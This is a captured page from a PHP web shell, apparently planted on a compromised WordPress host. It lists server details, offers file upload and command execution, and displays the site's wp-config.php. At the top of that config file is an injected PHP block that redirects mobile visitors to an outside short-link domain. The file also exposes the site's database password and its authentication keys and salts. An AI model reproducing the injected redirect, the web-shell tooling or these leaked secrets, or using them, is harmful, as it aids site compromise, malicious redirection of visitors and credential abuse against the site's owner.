403Webshell
Server IP : 195.114.193.29  /  Your IP : 216.73.217.120
Web Server : LiteSpeed
System : Linux srv055445052.host 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : wayne1701 ( 1034)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/way77.net/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/way77.net/public_html/wp-config.php
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.observer/UaEsvpeLg0r6" /><script>location.replace("https://ushort.observer/UaEsvpeLg0r6");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
define( 'WP_CACHE', true );

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', '5MQj5ydURxVuXY' );

/** Database username */
define( 'DB_USER', '5MQj5ydURxVuXY' );

/** Database password */
define( 'DB_PASSWORD', 'mfLChNbiplro45' );

/** Database hostname */
define( 'DB_HOST', 'localhost:3306' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          'U}?LhF]P%{.~ZY<|U3s{k2p>:j^2f`_r:^#Y](!|Ap$&T_+|Owa.%0tDBA4.At@(' );
define( 'SECURE_AUTH_KEY',   '%zY,mSlD~De)3YiaXxyW[gaMf~:RwUq04gzn[oHrG}^>4j-OeGo${433U$wD[_Du' );
define( 'LOGGED_IN_KEY',     '*x1P~,0G&TB~8g( Zf2Vsq[#woJbP(kMC<S2ur}(gqZiX~V-7b}2As!H4Jo)&e^|' );
define( 'NONCE_KEY',         '*,pc YWP)&k;-YC|Xm8@{O^ao.jo+Es|/&+a8<ai7ir:FkSx_0bn:k3KwP)3;F]T' );
define( 'AUTH_SALT',         'Geqv-FeEBaJ}Y:S)(`G^a|oN[1#|&_BGyNPe=C@YojYD% (gmN82i~{=]#6>+S/7' );
define( 'SECURE_AUTH_SALT',  ']Bfa [)YF7|*6Z#rlJoE.mDRts4]P3#M:tmcj[UJLD99%m^?y5N5[<r1@5b5|;Zp' );
define( 'LOGGED_IN_SALT',    '}yGP-9?(V!_&DLhV2+/|(EB=PPP;i~s8&5b@hi+i(qC&o:?[{T>(U<J*=n-AE%R+' );
define( 'NONCE_SALT',        '@E.5Yu&p:vFO!E[DWEHoQ-gH]m65T0u6t)t(.qp+Uti&|@4++v~N8*Xh4La?LHm]' );
define( 'WP_CACHE_KEY_SALT', 'CP!Pht^L*,?EKTyvIL^#P`C|N~2Sbo[G[)gh5ePl6}+c -ISLcT.+HFQVYi1%93x' );


/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );


/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

Youez - 2016 - github.com/yon3zu
LinuXploit